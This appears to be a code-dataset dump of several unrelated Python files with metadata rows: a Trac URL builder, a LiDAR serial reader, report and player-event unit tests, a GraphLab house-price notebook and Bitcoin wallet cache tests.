absolute URLs:
>>> href = Href('http://trac.edgewall.org')
>>> href('ticket', 540)
'http://trac.edgewall.org/ticket/540'
>>> href = Href('https://trac.edgewall.org')
>>> href('ticket', 540)
'https://trac.edgewall.org/ticket/540'
In common usage, it may improve readability to use the function-calling
ability for the first component of the URL as mentioned earlier:
>>> href = Href('/trac')
>>> href.ticket(540)
'/trac/ticket/540'
>>> href.browser('/trunk/README.txt', format='txt')
'/trac/browser/trunk/README.txt?format=txt'
The ``path_safe`` argument specifies the characters that don't
need to be quoted in the path arguments. Likewise, the
``query_safe`` argument specifies the characters that don't need
to be quoted in the query string:
>>> href = Href('')
>>> href.milestone('<look,here>', param='<here,too>')
'/milestone/%3Clook%2Chere%3E?param=%3Chere%2Ctoo%3E'
>>> href = Href('', path_safe='/<,', query_safe=',>')
>>> href.milestone('<look,here>', param='<here,too>')
'/milestone/<look,here%3E?param=%3Chere,too>'
"""
def __init__(self, base, path_safe="/!~*'()", query_safe="!~*'()"):
    """Create a URL generator rooted at *base* (trailing slashes removed).

    `path_safe` and `query_safe` list the characters left unquoted in the
    path and query-string portions, respectively.
    """
    self.path_safe = path_safe
    self.query_safe = query_safe
    self.base = base.rstrip('/')
    # Memoized per-name callables handed out by __getattr__.
    self._derived = {}
def __call__(self, *args, **kw):
    """Assemble a URL below the base from path segments and parameters.

    Positional arguments become quoted path components (``None`` entries
    are skipped).  If the last positional argument is a dict or a sequence
    of ``(name, value)`` pairs, it is consumed as query parameters instead
    of a path segment.  Keyword arguments also become query parameters; a
    single trailing underscore is stripped from their names so reserved
    words such as ``from_`` can be used.
    """
    query = []

    def collect(name, value):
        # Sequence values fan out into one parameter per element; None
        # values (and None elements) are silently dropped.
        if isinstance(value, (list, tuple)):
            query.extend((name, item) for item in value if item is not None)
        elif value is not None:
            query.append((name, value))

    if args:
        tail = args[-1]
        if isinstance(tail, dict):
            for name, value in tail.items():
                collect(name, value)
            args = args[:-1]
        elif isinstance(tail, (list, tuple)):
            for name, value in tail:
                collect(name, value)
            args = args[:-1]

    # Quote each remaining positional argument and join them into a path.
    segments = [unicode_quote(unicode(part).strip('/'), self.path_safe)
                for part in args if part is not None]
    path = '/'.join(segments)

    href = self.base
    if path:
        # Collapse duplicate slashes and anchor the path to the base.
        href += '/' + slashes_re.sub('/', path).lstrip('/')
    elif not href:
        href = '/'

    for name, value in kw.items():
        collect(name[:-1] if name.endswith('_') else name, value)
    if query:
        href += '?' + unicode_urlencode(query, self.query_safe)
    return href
def __getattr__(self, name):
    """Treat attribute access as a URL component, so that
    ``href.ticket(540)`` is equivalent to ``href('ticket', 540)``."""
    try:
        return self._derived[name]
    except KeyError:
        def derived(*args, **kw):
            return self(name, *args, **kw)
        self._derived[name] = derived
        return derived
# Printable ASCII characters (0x21-0x7e), used as the "safe" (unquoted)
# character set when __add__ appends raw path/query text.  (Python 2: xrange.)
_printable_safe = ''.join(map(chr, xrange(0x21, 0x7f)))
def __add__(self, rhs):
    """Support ``href + 'path'`` and ``href + '?query'`` concatenation,
    quoting any characters outside the printable ASCII range."""
    if not rhs:
        return self.base or '/'
    if rhs.startswith('?'):
        return (self.base or '/') + unicode_quote(rhs, self._printable_safe)
    # Ensure exactly one slash between the base and the appended path.
    prefix = '' if rhs.startswith('/') else '/'
    return self.base + unicode_quote(prefix + rhs, self._printable_safe)
if __name__ == '__main__':
    # Run the doctests embedded in this module when executed directly.
    import doctest
    import sys
    doctest.testmod(sys.modules[__name__])
| 1,877 | 0 | 108 |
8471be6e1f242d055d1f1f40b27848b9460a6fca | 601 | py | Python | PC_Benewake_TFmini_LiDAR.py | Chastonay-GP/2020-raspberry-pi-water-level | ec89ca7c75a2cf3435267b3dede51266b0fff41d | [
"FSFAP"
] | null | null | null | PC_Benewake_TFmini_LiDAR.py | Chastonay-GP/2020-raspberry-pi-water-level | ec89ca7c75a2cf3435267b3dede51266b0fff41d | [
"FSFAP"
] | null | null | null | PC_Benewake_TFmini_LiDAR.py | Chastonay-GP/2020-raspberry-pi-water-level | ec89ca7c75a2cf3435267b3dede51266b0fff41d | [
"FSFAP"
] | null | null | null | import serial
# Read distance frames from a Benewake TFmini LiDAR on a USB serial port.
#
# Frame layout (TFmini standard output format): each 9-byte frame starts
# with the two header bytes 0x59 0x59 ('Y', 'Y'), followed by the distance
# as a little-endian 16-bit value (Dist_L, Dist_H), then strength/quality
# bytes and a checksum, which this script discards.
import serial
import time

ser = serial.Serial('/dev/ttyUSB0', 115200, timeout=1)

# Command the sensor into its standard output format.  pyserial's write()
# takes byte-string data, not an int, so the eight command bytes are sent
# as a single bytes literal.  (The original wrote bare ints -- 0x42, 0x57,
# ... -- which raises TypeError in pyserial.)
ser.write(b'\x42\x57\x02\x00\x00\x00\x01\x06')

while True:
    # Wait until a full 9-byte frame is buffered before parsing.
    while ser.in_waiting >= 9:
        # Two 'Y' (0x59) bytes mark the start of a frame.
        if ('Y' == ser.read()) and ('Y' == ser.read()):
            Dist_L = ser.read()
            Dist_H = ser.read()
            # Distance in cm: high byte * 256 + low byte.
            Dist_Total = (ord(Dist_H) * 256) + (ord(Dist_L))
            # Discard the remaining 5 bytes (strength, mode, checksum).
            for i in range(0, 5):
                ser.read()
            #time.sleep(0.0005)
            print (Dist_Total)
| 23.115385 | 61 | 0.529118 | import serial
# Benewake TFmini LiDAR reader: polls a USB serial port and prints the
# measured distance parsed from each 9-byte sensor frame.
import time

ser = serial.Serial('/dev/ttyUSB0',115200,timeout = 1)
# Send the sensor-configuration command bytes 42 57 02 00 00 00 01 06.
# NOTE(review): pyserial's write() expects byte-string data; passing bare
# ints here likely raises TypeError -- confirm against the pyserial version
# in use (ser.write(b'\x42\x57\x02\x00\x00\x00\x01\x06') is the safe form).
ser.write(0x42)
ser.write(0x57)
ser.write(0x02)
ser.write(0x00)
ser.write(0x00)
ser.write(0x00)
ser.write(0x01)
ser.write(0x06)
while(True):
    # Wait until a full 9-byte frame is buffered before parsing.
    while(ser.in_waiting >= 9):
        #print ("a")
        # Two 'Y' (0x59) bytes mark the start of a frame.
        if(('Y' == ser.read()) and ('Y' == ser.read())):
            Dist_L = ser.read()
            Dist_H = ser.read()
            # Distance is little-endian 16 bits: high byte * 256 + low byte.
            Dist_Total = (ord(Dist_H) * 256) + (ord(Dist_L))
            # Skip the remaining 5 frame bytes (strength, mode, checksum).
            for i in range (0,5):
                ser.read()
            #time.sleep(0.0005)
            print (Dist_Total)
| 0 | 0 | 0 |
6a15aade8cc353754c14f8437cf9834a8d068d77 | 5,376 | py | Python | corehq/apps/reports/tests/test_sql_reports.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | null | null | null | corehq/apps/reports/tests/test_sql_reports.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | 94 | 2020-12-11T06:57:31.000Z | 2022-03-15T10:24:06.000Z | corehq/apps/reports/tests/test_sql_reports.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | null | null | null | from datetime import datetime, time
from django import test as unittest
from django.test.client import RequestFactory
from dimagi.utils.dates import DateSpan
from corehq.apps.domain.shortcuts import create_domain
from corehq.apps.users.models import WebUser
from corehq.sql_db.connections import Session
from corehq.util.dates import iso_string_to_date
from corehq.util.test_utils import softer_assert
from .sql_fixture import load_data
from .sql_reports import RegionTestReport, UserTestReport, test_report
DOMAIN = "test"
| 41.038168 | 109 | 0.635231 | from datetime import datetime, time
from django import test as unittest
from django.test.client import RequestFactory
from dimagi.utils.dates import DateSpan
from corehq.apps.domain.shortcuts import create_domain
from corehq.apps.users.models import WebUser
from corehq.sql_db.connections import Session
from corehq.util.dates import iso_string_to_date
from corehq.util.test_utils import softer_assert
from .sql_fixture import load_data
from .sql_reports import RegionTestReport, UserTestReport, test_report
DOMAIN = "test"
class BaseReportTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(BaseReportTest, cls).setUpClass()
load_data()
create_domain(DOMAIN)
cls.couch_user = WebUser.create(None, "report_test", "foobar", None, None)
cls.couch_user.add_domain_membership(DOMAIN, is_admin=True)
cls.couch_user.save()
cls.factory = RequestFactory()
@classmethod
def tearDownClass(cls):
cls.couch_user.delete(deleted_by=None)
Session.remove()
super(BaseReportTest, cls).tearDownClass()
def _get_report_data(self, report, startdate, enddate):
req = self._get_request(startdate, enddate)
rep = report(req, in_testing=True)
json = rep.json_dict['aaData']
html_data, sort_data = [], []
for row in json:
html_row, sort_row = [], []
for val in row:
if isinstance(val, dict):
html_row.append(val["html"])
sort_row.append(val["sort_key"])
else:
html_row.append(val)
sort_row.append(val)
html_data.append(html_row)
sort_data.append(sort_row)
return html_data, sort_data
def _get_request(self, startdate, enddate):
request = self.factory.get('/')
request.couch_user = self.couch_user
request.datespan = DateSpan(self.date(startdate), self.date(enddate))
return request
def date(self, d):
return datetime.combine(iso_string_to_date(d), time())
class SimpleReportTest(BaseReportTest):
    """Aggregation checks for the fixture-backed SQL reports over the
    2013-01-01 .. 2013-02-01 date window."""

    def test_no_group_no_filter(self):
        _, rows = self._get_report_data(
            test_report(UserTestReport), "2013-01-01", "2013-02-01")
        self.assertEqual(len(rows), 1)
        self.assertEqual(rows[0], [2, 2, 66])

    def test_no_group_with_filter(self):
        report = test_report(UserTestReport, filters=["date > :startdate"])
        _, rows = self._get_report_data(report, "2013-01-01", "2013-02-01")
        self.assertEqual(len(rows), 1)
        self.assertEqual(rows[0], [1, 1, 66])

    def test_with_group_no_filter(self):
        # Explicit keys pin the row ordering.
        report = test_report(UserTestReport, keys=[["user1"], ["user2"]],
                             group_by=['user'])
        _, rows = self._get_report_data(report, "2013-01-01", "2013-02-01")
        self.assertEqual(len(rows), 2)
        self.assertEqual(rows[0], ['Joe', 1, 1, 100])
        self.assertEqual(rows[1], ['Bob', 1, 1, 50])

    def test_with_group_with_filter(self):
        # Explicit keys pin the row ordering.
        report = test_report(UserTestReport, keys=[["user1"], ["user2"]],
                             filters=["date > :startdate"], group_by=['user'])
        _, rows = self._get_report_data(report, "2013-01-01", "2013-02-01")
        self.assertEqual(len(rows), 2)
        self.assertEqual(rows[0], ['Joe', 0, 1, 100])
        self.assertEqual(rows[1], ['Bob', 1, 0, 50])

    def test_extra_keys(self):
        # A key with no matching data still yields a row of placeholders.
        report = test_report(UserTestReport,
                             keys=[["user1"], ["user2"], ["user3"]],
                             group_by=['user'])
        _, rows = self._get_report_data(report, "2013-01-01", "2013-02-01")
        self.assertEqual(len(rows), 3)
        self.assertEqual(rows[0], ['Joe', 1, 1, 100])
        self.assertEqual(rows[1], ['Bob', 1, 1, 50])
        self.assertEqual(rows[2], ['Gill', '--', '--', '--'])

    def test_formatting(self):
        report = test_report(UserTestReport, keys=[["user1"], ["user2"]],
                             group_by=['user'])
        display, rows = self._get_report_data(report, "2013-01-01", "2013-02-01")
        self.assertEqual(len(rows), 2)
        # Display values are formatted percentages; sort keys stay numeric.
        self.assertEqual(display[0], ['Joe', 1, 1, "100%"])
        self.assertEqual(display[1], ['Bob', 1, 1, "50%"])
        self.assertEqual(rows[0], ['Joe', 1, 1, 100])
        self.assertEqual(rows[1], ['Bob', 1, 1, 50])

    def test_multi_level_grouping(self):
        region_keys = [
            ["region1", "region1_a"], ["region1", "region1_b"],
            ["region2", "region2_a"], ["region2", "region2_b"],
        ]
        report = test_report(RegionTestReport, keys=region_keys,
                             group_by=["region", "sub_region"])
        _, rows = self._get_report_data(report, "2013-01-01", "2013-02-01")
        self.assertEqual(len(rows), 4)
        self.assertEqual(rows[0], ['Cape Town', 'Ronderbosch', 2, 1])
        self.assertEqual(rows[1], ['Cape Town', 'Newlands', 0, 1])
        self.assertEqual(rows[2], ['Durban', 'Glenwood', 1, 2])
        self.assertEqual(rows[3], ['Durban', 'Morningside', 1, 0])
| 4,404 | 206 | 235 |
f69f04ff046fb9ac1b27d85f735f3a20981576fc | 1,213 | py | Python | tests/store/test_player_events.py | aequitas/munerator | deb1d2ed6c06d17bf3005d75a03e4f2eb7a9938e | [
"MIT"
] | null | null | null | tests/store/test_player_events.py | aequitas/munerator | deb1d2ed6c06d17bf3005d75a03e4f2eb7a9938e | [
"MIT"
] | null | null | null | tests/store/test_player_events.py | aequitas/munerator | deb1d2ed6c06d17bf3005d75a03e4f2eb7a9938e | [
"MIT"
] | null | null | null | from munerator.store import handle_event, setup_eve_mongoengine
| 22.886792 | 71 | 0.598516 | from munerator.store import handle_event, setup_eve_mongoengine
def test_add_player(db, uuid):
    """A clientuserinfochanged event for a new guid creates a player record."""
    client_info = {
        'id': uuid,
        'guid': uuid,
        'name': 'test',
    }
    handle_event('clientuserinfochanged', {'client_info': client_info}, None)
    stored = db.players.find_one()
    assert stored['name'] == client_info['name']
    assert client_info['guid'] in stored['guids']
def test_update_player(db, uuid):
    """A second event for the same guid renames the player and keeps the
    previous name in its name history."""
    first = {
        'id': uuid,
        'guid': uuid,
        'name': 'test',
    }
    handle_event('clientuserinfochanged', {'client_info': first}, None)
    assert db.players.find_one()['name'] == first['name']

    renamed = {
        'id': uuid,
        'guid': uuid,
        'name': 'test2',
    }
    handle_event('clientuserinfochanged', {'client_info': renamed}, None)
    stored = db.players.find_one()
    assert stored['name'] == renamed['name']
    assert first['name'] in stored['names']
def test_updated_created_fields(db, uuid):
    """Inserted players carry the _updated and _created timestamp fields."""
    setup_eve_mongoengine('', 0)
    client_info = {'name': 'test'}
    handle_event('clientuserinfochanged', {'client_info': client_info}, None)
    stored = db.players.find_one()
    assert stored['_updated']
    assert stored['_created']
| 1,077 | 0 | 69 |
2f93144ea0e7a9ec3d12b51325d8760bd959ad44 | 6,201 | py | Python | course1/week2/quiz2/PredictingHousePrices.py | eroicaleo/MachineLearningUW | c9addb23119e2db41e2a467baafe6bd2ce2acbcb | [
"MIT"
] | null | null | null | course1/week2/quiz2/PredictingHousePrices.py | eroicaleo/MachineLearningUW | c9addb23119e2db41e2a467baafe6bd2ce2acbcb | [
"MIT"
] | null | null | null | course1/week2/quiz2/PredictingHousePrices.py | eroicaleo/MachineLearningUW | c9addb23119e2db41e2a467baafe6bd2ce2acbcb | [
"MIT"
] | null | null | null |
# coding: utf-8
# Exported IPython notebook script (Python 2): predicting King County
# house prices with GraphLab Create linear regression.
# NOTE(review): uses Python 2 print statements, the third-party graphlab
# package, and get_ipython() magics -- runs only inside an IPython/py2
# GraphLab environment.
# #Fire up graphlab create
# In[35]:
import graphlab
# #Load some house sales data
#
# Dataset is from house sales in King County, the region where the city of Seattle, WA is located.
# In[36]:
sales = graphlab.SFrame('home_data.gl/')
# In[37]:
sales
# #Exploring the data for housing sales
# The house price is correlated with the number of square feet of living space.
# In[38]:
graphlab.canvas.set_target('ipynb')
sales.show(view="Scatter Plot", x="sqft_living", y="price")
# #Create a simple regression model of sqft_living to price
# Split data into training and testing.
# We use seed=0 so that everyone running this notebook gets the same results. In practice, you may set a random seed (or let GraphLab Create pick a random seed for you).
# In[39]:
train_data,test_data = sales.random_split(.8,seed=0)
# ##Build the regression model using only sqft_living as a feature
# In[40]:
sqft_model = graphlab.linear_regression.create(train_data, target='price', features=['sqft_living'])
# #Evaluate the simple model
# In[41]:
print test_data['price'].mean()
# In[42]:
print sqft_model.evaluate(test_data)
# RMSE of about \$255,170!
# #Let's show what our predictions look like
# Matplotlib is a Python plotting library that is also useful for plotting. You can install it with:
#
# 'pip install matplotlib'
# In[43]:
import matplotlib.pyplot as plt
get_ipython().magic(u'matplotlib inline')
# In[44]:
plt.plot(test_data['sqft_living'],test_data['price'],'.',
         test_data['sqft_living'],sqft_model.predict(test_data),'-')
# Above: blue dots are original data, green line is the prediction from the simple regression.
#
# Below: we can view the learned regression coefficients.
# In[45]:
sqft_model.get('coefficients')
# #Explore other features in the data
#
# To build a more elaborate model, we will explore using more features.
# In[46]:
my_features = ['bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors', 'zipcode']
# In[47]:
sales[my_features].show()
# In[48]:
sales.show(view='BoxWhisker Plot', x='zipcode', y='price')
# Pull the bar at the bottom to view more of the data.
#
# 98039 is the most expensive zip code.
# #Build a regression model with more features
# In[49]:
my_features_model = graphlab.linear_regression.create(train_data,target='price',features=my_features)
# In[50]:
print my_features
# ##Comparing the results of the simple model with adding more features
# In[51]:
print sqft_model.evaluate(test_data)
print my_features_model.evaluate(test_data)
# The RMSE goes down from \$255,170 to \$179,508 with more features.
# #Apply learned models to predict prices of 3 houses
# The first house we will use is considered an "average" house in Seattle.
# In[52]:
house1 = sales[sales['id']=='5309101200']
# In[53]:
house1
# <img src="house-5309101200.jpg">
# In[54]:
print house1['price']
# In[55]:
print sqft_model.predict(house1)
# In[56]:
print my_features_model.predict(house1)
# In this case, the model with more features provides a worse prediction than the simpler model with only 1 feature. However, on average, the model with more features is better.
# ##Prediction for a second, fancier house
#
# We will now examine the predictions for a fancier house.
# In[57]:
house2 = sales[sales['id']=='1925069082']
# In[58]:
house2
# <img src="house-1925069082.jpg">
# In[59]:
print sqft_model.predict(house2)
# In[60]:
print my_features_model.predict(house2)
# In this case, the model with more features provides a better prediction. This behavior is expected here, because this house is more differentiated by features that go beyond its square feet of living space, especially the fact that it's a waterfront house.
# ##Last house, super fancy
#
# Our last house is a very large one owned by a famous Seattleite.
# In[61]:
bill_gates = {'bedrooms':[8],
              'bathrooms':[25],
              'sqft_living':[50000],
              'sqft_lot':[225000],
              'floors':[4],
              'zipcode':['98039'],
              'condition':[10],
              'grade':[10],
              'waterfront':[1],
              'view':[4],
              'sqft_above':[37500],
              'sqft_basement':[12500],
              'yr_built':[1994],
              'yr_renovated':[2010],
              'lat':[47.627606],
              'long':[-122.242054],
              'sqft_living15':[5000],
              'sqft_lot15':[40000]}
# <img src="house-bill-gates.jpg">
# In[62]:
print my_features_model.predict(graphlab.SFrame(bill_gates))
# The model predicts a price of over $13M for this house! But we expect the house to cost much more. (There are very few samples in the dataset of houses that are this fancy, so we don't expect the model to capture a perfect prediction here.)
# In[63]:
house_zip_code = sales[sales["zipcode"] == "98039"]
# In[64]:
house_zip_code
# In[65]:
house_zip_code['price'].mean()
# In[66]:
house_zip_code_range = house_zip_code[house_zip_code.apply(lambda x: x['sqft_living'] > 2000.0 and x['sqft_living'] <= 4000.0)]
# In[67]:
house_zip_code_range.head()
# In[68]:
house_zip_code_range.num_rows()
# In[69]:
house_zip_code.num_rows()
# In[70]:
advanced_features = [
    'bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors', 'zipcode',
    'condition', # condition of house
    'grade', # measure of quality of construction
    'waterfront', # waterfront property
    'view', # type of view
    'sqft_above', # square feet above ground
    'sqft_basement', # square feet in basement
    'yr_built', # the year built
    'yr_renovated', # the year renovated
    'lat', 'long', # the lat-long of the parcel
    'sqft_living15', # average sq.ft. of 15 nearest neighbors
    'sqft_lot15', # average lot size of 15 nearest neighbors
]
# In[71]:
advanced_features_model = graphlab.linear_regression.create(train_data, target='price', features=advanced_features)
# In[72]:
print advanced_features_model.evaluate(test_data)
# In[73]:
advanced_features_model.evaluate(test_data)['rmse'] - my_features_model.evaluate(test_data)['rmse']
# In[ ]:
# In[ ]:
| 19.938907 | 260 | 0.680213 |
# coding: utf-8
# #Fire up graphlab create
# In[35]:
import graphlab
# #Load some house sales data
#
# Dataset is from house sales in King County, the region where the city of Seattle, WA is located.
# In[36]:
sales = graphlab.SFrame('home_data.gl/')
# In[37]:
sales
# #Exploring the data for housing sales
# The house price is correlated with the number of square feet of living space.
# In[38]:
graphlab.canvas.set_target('ipynb')
sales.show(view="Scatter Plot", x="sqft_living", y="price")
# #Create a simple regression model of sqft_living to price
# Split data into training and testing.
# We use seed=0 so that everyone running this notebook gets the same results. In practice, you may set a random seed (or let GraphLab Create pick a random seed for you).
# In[39]:
train_data,test_data = sales.random_split(.8,seed=0)
# ##Build the regression model using only sqft_living as a feature
# In[40]:
sqft_model = graphlab.linear_regression.create(train_data, target='price', features=['sqft_living'])
# #Evaluate the simple model
# In[41]:
print test_data['price'].mean()
# In[42]:
print sqft_model.evaluate(test_data)
# RMSE of about \$255,170!
# #Let's show what our predictions look like
# Matplotlib is a Python plotting library that is also useful for plotting. You can install it with:
#
# 'pip install matplotlib'
# In[43]:
import matplotlib.pyplot as plt
get_ipython().magic(u'matplotlib inline')
# In[44]:
plt.plot(test_data['sqft_living'],test_data['price'],'.',
test_data['sqft_living'],sqft_model.predict(test_data),'-')
# Above: blue dots are original data, green line is the prediction from the simple regression.
#
# Below: we can view the learned regression coefficients.
# In[45]:
sqft_model.get('coefficients')
# #Explore other features in the data
#
# To build a more elaborate model, we will explore using more features.
# In[46]:
my_features = ['bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors', 'zipcode']
# In[47]:
sales[my_features].show()
# In[48]:
sales.show(view='BoxWhisker Plot', x='zipcode', y='price')
# Pull the bar at the bottom to view more of the data.
#
# 98039 is the most expensive zip code.
# #Build a regression model with more features
# In[49]:
my_features_model = graphlab.linear_regression.create(train_data,target='price',features=my_features)
# In[50]:
print my_features
# ##Comparing the results of the simple model with adding more features
# In[51]:
print sqft_model.evaluate(test_data)
print my_features_model.evaluate(test_data)
# The RMSE goes down from \$255,170 to \$179,508 with more features.
# #Apply learned models to predict prices of 3 houses
# The first house we will use is considered an "average" house in Seattle.
# In[52]:
house1 = sales[sales['id']=='5309101200']
# In[53]:
house1
# <img src="house-5309101200.jpg">
# In[54]:
print house1['price']
# In[55]:
print sqft_model.predict(house1)
# In[56]:
print my_features_model.predict(house1)
# In this case, the model with more features provides a worse prediction than the simpler model with only 1 feature. However, on average, the model with more features is better.
# ##Prediction for a second, fancier house
#
# We will now examine the predictions for a fancier house.
# In[57]:
house2 = sales[sales['id']=='1925069082']
# In[58]:
house2
# <img src="house-1925069082.jpg">
# In[59]:
print sqft_model.predict(house2)
# In[60]:
print my_features_model.predict(house2)
# In this case, the model with more features provides a better prediction. This behavior is expected here, because this house is more differentiated by features that go beyond its square feet of living space, especially the fact that it's a waterfront house.
# ##Last house, super fancy
#
# Our last house is a very large one owned by a famous Seattleite.
# In[61]:
bill_gates = {'bedrooms':[8],
'bathrooms':[25],
'sqft_living':[50000],
'sqft_lot':[225000],
'floors':[4],
'zipcode':['98039'],
'condition':[10],
'grade':[10],
'waterfront':[1],
'view':[4],
'sqft_above':[37500],
'sqft_basement':[12500],
'yr_built':[1994],
'yr_renovated':[2010],
'lat':[47.627606],
'long':[-122.242054],
'sqft_living15':[5000],
'sqft_lot15':[40000]}
# <img src="house-bill-gates.jpg">
# In[62]:
print my_features_model.predict(graphlab.SFrame(bill_gates))
# The model predicts a price of over $13M for this house! But we expect the house to cost much more. (There are very few samples in the dataset of houses that are this fancy, so we don't expect the model to capture a perfect prediction here.)
# In[63]:
house_zip_code = sales[sales["zipcode"] == "98039"]
# In[64]:
house_zip_code
# In[65]:
house_zip_code['price'].mean()
# In[66]:
house_zip_code_range = house_zip_code[house_zip_code.apply(lambda x: x['sqft_living'] > 2000.0 and x['sqft_living'] <= 4000.0)]
# In[67]:
house_zip_code_range.head()
# In[68]:
house_zip_code_range.num_rows()
# In[69]:
house_zip_code.num_rows()
# In[70]:
advanced_features = [
'bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors', 'zipcode',
'condition', # condition of house
'grade', # measure of quality of construction
'waterfront', # waterfront property
'view', # type of view
'sqft_above', # square feet above ground
'sqft_basement', # square feet in basement
'yr_built', # the year built
'yr_renovated', # the year renovated
'lat', 'long', # the lat-long of the parcel
'sqft_living15', # average sq.ft. of 15 nearest neighbors
'sqft_lot15', # average lot size of 15 nearest neighbors
]
# In[71]:
advanced_features_model = graphlab.linear_regression.create(train_data, target='price', features=advanced_features)
# In[72]:
print advanced_features_model.evaluate(test_data)
# In[73]:
advanced_features_model.evaluate(test_data)['rmse'] - my_features_model.evaluate(test_data)['rmse']
# In[ ]:
# In[ ]:
| 0 | 0 | 0 |
1f86701824cf61a12df75ebaea242b4272d39e29 | 18,076 | py | Python | tests/wallet/test_cache_manager.py | febuiles/two1-python | 88704487dba7715f97a0980781d4c0efb2ea7fc4 | [
"BSD-2-Clause-FreeBSD"
] | 415 | 2016-06-10T00:46:55.000Z | 2021-10-16T00:56:06.000Z | tests/wallet/test_cache_manager.py | febuiles/two1-python | 88704487dba7715f97a0980781d4c0efb2ea7fc4 | [
"BSD-2-Clause-FreeBSD"
] | 25 | 2016-06-11T13:48:59.000Z | 2021-01-05T11:19:30.000Z | tests/wallet/test_cache_manager.py | febuiles/two1-python | 88704487dba7715f97a0980781d4c0efb2ea7fc4 | [
"BSD-2-Clause-FreeBSD"
] | 109 | 2016-06-11T05:17:05.000Z | 2021-12-22T11:02:22.000Z | import inspect
import os.path
import time
from two1.blockchain.twentyone_provider import TwentyOneProvider
from two1.bitcoin.hash import Hash
from two1.wallet.cache_manager import CacheManager
from two1.wallet.wallet_txn import WalletTransaction
this_file_path = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
cm = CacheManager()
dp = TwentyOneProvider()
| 46.112245 | 796 | 0.750553 | import inspect
import os.path
import time
from two1.blockchain.twentyone_provider import TwentyOneProvider
from two1.bitcoin.hash import Hash
from two1.wallet.cache_manager import CacheManager
from two1.wallet.wallet_txn import WalletTransaction
# Absolute directory of this test file (useful for locating on-disk fixtures).
this_file_path = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
# Module-level singletons shared by the tests below: the cache under test
# and a blockchain data provider.
# NOTE(review): TwentyOneProvider may hit the network when queried -- confirm
# the tests below only exercise the local cache state.
cm = CacheManager()
dp = TwentyOneProvider()
def test_addresses():
    """Insert payment/change addresses into the shared CacheManager and
    verify the cache structure and lookup helpers."""
    # (account 0, chain 0) -- payment chain, deliberately sparse indices.
    payment_addrs = [
        (0, "15qCydrcqURADXJHrtMW9m6SpPTa3kqkQb"),
        (1, "15hyvVXH2eJnakwhpqKBf5oTCa3o2bp8m8"),
        (19, "17TNXJSWjBdMpHAkSfuyfVKSvb3rLuWZqQ"),
    ]
    # (account 0, chain 1) -- change chain, contiguous indices 0..9.
    change_addrs = [
        (0, "1BbPtYsbBPFRCwnU5RuMTttraghXQ5JSZm"),
        (1, "1JuFprygqrra7vwYzrpBkGUbXjYao3RaR3"),
        (2, "16iY4btKxq9tz7sSZnva3691RYigcWDaSv"),
        (3, "1MDXXbB8JBV4bZU4buzxV456RAFqL7Z93f"),
        (4, "18vZXvhQAg8Fd8Ym7fbDUiBQS8o1iYDnkT"),
        (5, "1A9Gn3srogH6nNSqyWRf4YSBvvarvJzepc"),
        (6, "1FHkYaLSQ9A32PAopjLiBdZr1XQ5TueJWr"),
        (7, "1FAqCWr2EkAz43JzPRsdqLKBQeLJo4Tc7M"),
        (8, "12gR11fhqeDWpERmTfggVKUpDLfkq1dKbZ"),
        (9, "1Pr6wKbrfbtqacm4aDhN4zscMTAbc7cztz"),
    ]
    for index, addr in payment_addrs:
        cm.insert_address(0, 0, index, addr)
    for index, addr in change_addrs:
        cm.insert_address(0, 1, index, addr)

    assert 0 in cm._address_cache
    assert list(cm._address_cache[0].keys()) == [0, 1]
    payment_chain = cm._address_cache[0][0]
    change_chain = cm._address_cache[0][1]
    assert len(payment_chain.keys()) == 3
    assert list(payment_chain.keys()) == [0, 1, 19]
    assert len(change_chain.keys()) == 10

    assert cm.get_address(0, 0, 1) == "15hyvVXH2eJnakwhpqKBf5oTCa3o2bp8m8"
    assert cm.get_address(0, 0, 19) == "17TNXJSWjBdMpHAkSfuyfVKSvb3rLuWZqQ"
    assert cm.get_address(0, 1, 7) == "1FAqCWr2EkAz43JzPRsdqLKBQeLJo4Tc7M"

    payment_listed = cm.get_addresses_for_chain(0, 0)
    assert len(payment_listed) == 3
    for _, addr in payment_addrs:
        assert addr in payment_listed

    change_listed = cm.get_addresses_for_chain(0, 1)
    assert len(change_listed) == 10

    assert cm.get_chain_indices(0, 0) == [0, 1, 19]
    assert cm.get_chain_indices(0, 1) == list(range(10))
def test_txns():
    """Walk the shared CacheManager through its transaction state machine.

    Steps:
      1. Insert a confirmed txn and verify the txn/input/output caches,
         per-address deposit/spend indexes and address balances.
      2. Insert a second txn as unconfirmed, then re-insert it confirmed,
         checking that output statuses, balances and UTXOs update.
      3. Insert a third txn provisionally (first with a short expiration to
         test pruning), then re-insert unconfirmed, then confirmed.
      4. Delete the third txn and verify all caches roll back.

    NOTE: depends on the addresses inserted by test_addresses() and mutates
    the module-level ``cm`` fixture.
    """
    # --- Step 1: confirmed transaction. ---
    txn = WalletTransaction.from_hex('01000000029ccb0665ec780f8b05bf2315a48dfb154dc41f91e8046a59f1c75656826dea5d000000006b483045022100f4d2161473f9d0ba4b5cdbc9e5b7b1d8fca32e3b6bede307352bef6aaa3a08cd022023d8444f78f69de6fd0f6cc391a7ca4de3dc4181220932d01511eb1129fee09e01210328bd51733a7d5bee05368680adef9aaa3f9bb716ec716d5896b1d80afb734d6cffffffff2424cb910235b2059d59023aecfebf6fce4eee31c637e9a0b350491849688727020000006a473044022072de3d707f98adfed3266e0261750cd7b5162732e525d7df17f4e55a55e953b902205046b597acf7acf41e725b459ba6cfe8c03a9d877375cdf483cab9620f92961101210291cbb1304614d86b15f4e8f39e9d8299cd0304ff8b81b5bcf6d9a6f32be649bbffffffff0240420f00000000001976a91434fe777d676fceb3509584c1d7b9f13ee56514d488ace05a0000000000001976a9145237ba33122495420711b3f2cc0463dbb24c9d3988ac00000000')  # nopep8
    txn.block = 374440
    txn.block_hash = Hash('0000000000000000038ee0066680705455d500f287f6c56db7a979c2426a4c02')
    txn.confirmations = 7533
    cm.insert_txn(txn)

